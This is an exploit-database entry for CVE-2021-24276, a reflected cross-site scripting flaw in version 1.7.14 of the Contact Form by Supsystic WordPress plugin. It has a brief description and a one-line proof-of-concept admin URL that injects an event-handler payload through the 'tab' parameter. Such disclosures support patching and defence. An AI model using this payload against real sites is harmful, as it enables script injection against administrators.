Lucene search

K
zdt0xB91337DAY-ID-36821
HistorySep 28, 2021 - 12:00 a.m.

WordPress Contact Form 1.7.14 Plugin - Reflected Cross-Site Scripting Vulnerability

2021-09-2800:00:00
0xB9
0day.today
137
wordpress
contact form
reflected cross-site scripting
supsystic
options page
attribute
alert
cve-2021-24276

EPSS

0.002

Percentile

64.8%

# Exploit Title: WordPress Plugin Contact Form 1.7.14 - Reflected Cross-Site Scripting (XSS)
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/contact-form-by-supsystic/
# Version: 1.7.14
# Tested on: Windows 10
# CVE: CVE-2021-24276

1. Description:
The Contact Form by Supsystic WordPress plugin before 1.7.15 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue

2. Proof of Concept:
/wp-admin/admin.php?page=contact-form-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//